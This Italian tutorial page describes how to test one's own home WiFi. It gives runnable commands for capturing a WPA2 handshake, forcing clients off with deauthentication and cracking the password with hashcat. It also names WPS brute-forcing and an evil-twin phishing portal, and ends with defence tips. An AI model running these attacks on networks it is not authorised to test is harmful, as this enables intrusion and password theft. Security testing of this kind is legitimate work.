Home › Dispositivi › WiFi / rete

WiFi / rete — cosa puoi fare

La rete di casa: scoprire chi c'è, catturare l'handshake, testare la password e la robustezza.

Solo sulla tua rete WiFi. Serve una scheda con monitor mode (chiavette Alfa).

Passo 1 — chi c'è nella rete

# la tua sottorete
ip addr
# tutti i dispositivi vivi (IP + MAC + produttore)
sudo arp-scan --localnet

Cosa puoi fare / testare

CosaComeTool
Vedere reti e client viciniMonitor mode + radar delle retiairodump-ng
Catturare l'handshake WPA2Ascolti la tua rete e forzi una riconnessioneairodump-ng + aireplay-ng
Craccare la passwordProvi l'handshake contro una wordlisthashcat / aircrack-ng
Prendere il PMKID (senza client)Dall'access point da solohcxdumptool
Convertire la cattura per il crackFormato per hashcat 22000hcxtools
Attaccare il PIN WPSBrute o Pixie-Dust del WPSreaver
Fare tutto in automaticoScan → deauth → cattura → crackwifite
Rete gemella (evil twin)AP falso + portale per rubare la passwordwifiphisher
Radar avanzato WiFi/BTRileva reti e dispositivi nascostikismet

Prova a casa (sequenza rapida)

sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon                # trova BSSID e canale TUOI
sudo airodump-ng -c CH --bssid TUO_BSSID -w cap wlan0mon
sudo aireplay-ng --deauth 5 -a TUO_BSSID wlan0mon   # in un 2° terminale
hashcat -m 22000 cap.hc22000 /usr/share/wordlists/rockyou.txt

Guida completa: WiFi Cracking (dettaglio).

Difesa

  • Password WiFi lunga e casuale (12+): rende inutile la wordlist.
  • WPA3 se il router lo supporta.
  • Disattiva WPS (vulnerabile).
  • Rete ospiti separata per gli IoT.
Il router in sé (pannello, CVE): Router / modem. Catalogo: Arsenale · Wireless.